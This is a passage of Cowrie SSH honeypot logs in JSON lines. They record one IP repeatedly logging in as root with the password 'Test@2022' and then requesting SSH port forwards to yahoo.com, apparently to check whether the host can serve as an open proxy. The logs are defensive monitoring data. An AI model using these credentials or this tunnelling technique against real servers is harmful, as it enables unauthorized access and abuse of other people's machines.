{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:51.437100Z","src_ip":"213.209.150.239","session":"e9b30b5ad2f8"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":1974,"dst_ip":"1.2.3.4","dst_port":22,"session":"a16f04e557cd","protocol":"ssh","message":"New connection: 213.209.150.239:1974 (1.2.3.4:22) [session: a16f04e557cd]","sensor":"my-vps","timestamp":"2025-08-26T00:58:51.483122Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:51.484309Z","src_ip":"213.209.150.239","session":"a16f04e557cd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:51.531590Z","src_ip":"213.209.150.239","session":"a16f04e557cd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:51.766592Z","src_ip":"213.209.150.239","session":"a16f04e557cd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":23692,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:23692","sensor":"my-vps","timestamp":"2025-08-26T00:58:51.814899Z","session":"a16f04e557cd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:51.862257Z","src_ip":"213.209.150.239","session":"a16f04e557cd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":19666,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:19666","sensor":"my-vps","timestamp":"2025-08-26T00:58:51.998090Z","session":"a16f04e557cd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:52.045832Z","src_ip":"213.209.150.239","session":"a16f04e557cd"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:52.094105Z","src_ip":"213.209.150.239","session":"a16f04e557cd"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":2015,"dst_ip":"1.2.3.4","dst_port":22,"session":"8eb120d4d423","protocol":"ssh","message":"New connection: 213.209.150.239:2015 (1.2.3.4:22) [session: 8eb120d4d423]","sensor":"my-vps","timestamp":"2025-08-26T00:58:52.149557Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:52.150675Z","src_ip":"213.209.150.239","session":"8eb120d4d423"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:52.207334Z","src_ip":"213.209.150.239","session":"8eb120d4d423"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:52.490532Z","src_ip":"213.209.150.239","session":"8eb120d4d423"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":26739,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:26739","sensor":"my-vps","timestamp":"2025-08-26T00:58:52.548434Z","session":"8eb120d4d423"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:52.605350Z","src_ip":"213.209.150.239","session":"8eb120d4d423"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":28651,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:28651","sensor":"my-vps","timestamp":"2025-08-26T00:58:52.758874Z","session":"8eb120d4d423"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:52.815401Z","src_ip":"213.209.150.239","session":"8eb120d4d423"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:52.872921Z","src_ip":"213.209.150.239","session":"8eb120d4d423"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":2068,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e0bef257586","protocol":"ssh","message":"New connection: 213.209.150.239:2068 (1.2.3.4:22) [session: 0e0bef257586]","sensor":"my-vps","timestamp":"2025-08-26T00:58:52.919196Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:52.920375Z","src_ip":"213.209.150.239","session":"0e0bef257586"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:52.967396Z","src_ip":"213.209.150.239","session":"0e0bef257586"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:53.202030Z","src_ip":"213.209.150.239","session":"0e0bef257586"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":14622,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:14622","sensor":"my-vps","timestamp":"2025-08-26T00:58:53.250255Z","session":"0e0bef257586"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:53.298011Z","src_ip":"213.209.150.239","session":"0e0bef257586"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":1555,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:1555","sensor":"my-vps","timestamp":"2025-08-26T00:58:53.433850Z","session":"0e0bef257586"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:53.480902Z","src_ip":"213.209.150.239","session":"0e0bef257586"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:53.528862Z","src_ip":"213.209.150.239","session":"0e0bef257586"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":2108,"dst_ip":"1.2.3.4","dst_port":22,"session":"98f579d397eb","protocol":"ssh","message":"New connection: 213.209.150.239:2108 (1.2.3.4:22) [session: 98f579d397eb]","sensor":"my-vps","timestamp":"2025-08-26T00:58:53.575138Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:53.584930Z","src_ip":"213.209.150.239","session":"98f579d397eb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:53.622529Z","src_ip":"213.209.150.239","session":"98f579d397eb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:53.857131Z","src_ip":"213.209.150.239","session":"98f579d397eb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":28366,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:28366","sensor":"my-vps","timestamp":"2025-08-26T00:58:53.905236Z","session":"98f579d397eb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:53.952631Z","src_ip":"213.209.150.239","session":"98f579d397eb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":24246,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:24246","sensor":"my-vps","timestamp":"2025-08-26T00:58:54.097524Z","session":"98f579d397eb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:54.145452Z","src_ip":"213.209.150.239","session":"98f579d397eb"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:54.193985Z","src_ip":"213.209.150.239","session":"98f579d397eb"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":2152,"dst_ip":"1.2.3.4","dst_port":22,"session":"3898ff382d53","protocol":"ssh","message":"New connection: 213.209.150.239:2152 (1.2.3.4:22) [session: 3898ff382d53]","sensor":"my-vps","timestamp":"2025-08-26T00:58:54.239827Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:54.240474Z","src_ip":"213.209.150.239","session":"3898ff382d53"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:54.287711Z","src_ip":"213.209.150.239","session":"3898ff382d53"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:54.522066Z","src_ip":"213.209.150.239","session":"3898ff382d53"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":27238,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:27238","sensor":"my-vps","timestamp":"2025-08-26T00:58:54.570274Z","session":"3898ff382d53"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:54.618473Z","src_ip":"213.209.150.239","session":"3898ff382d53"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":10464,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:10464","sensor":"my-vps","timestamp":"2025-08-26T00:58:54.753343Z","session":"3898ff382d53"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:54.800441Z","src_ip":"213.209.150.239","session":"3898ff382d53"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:54.848061Z","src_ip":"213.209.150.239","session":"3898ff382d53"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":2200,"dst_ip":"1.2.3.4","dst_port":22,"session":"1be8fdbd4332","protocol":"ssh","message":"New connection: 213.209.150.239:2200 (1.2.3.4:22) [session: 1be8fdbd4332]","sensor":"my-vps","timestamp":"2025-08-26T00:58:54.894593Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:54.895706Z","src_ip":"213.209.150.239","session":"1be8fdbd4332"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@opens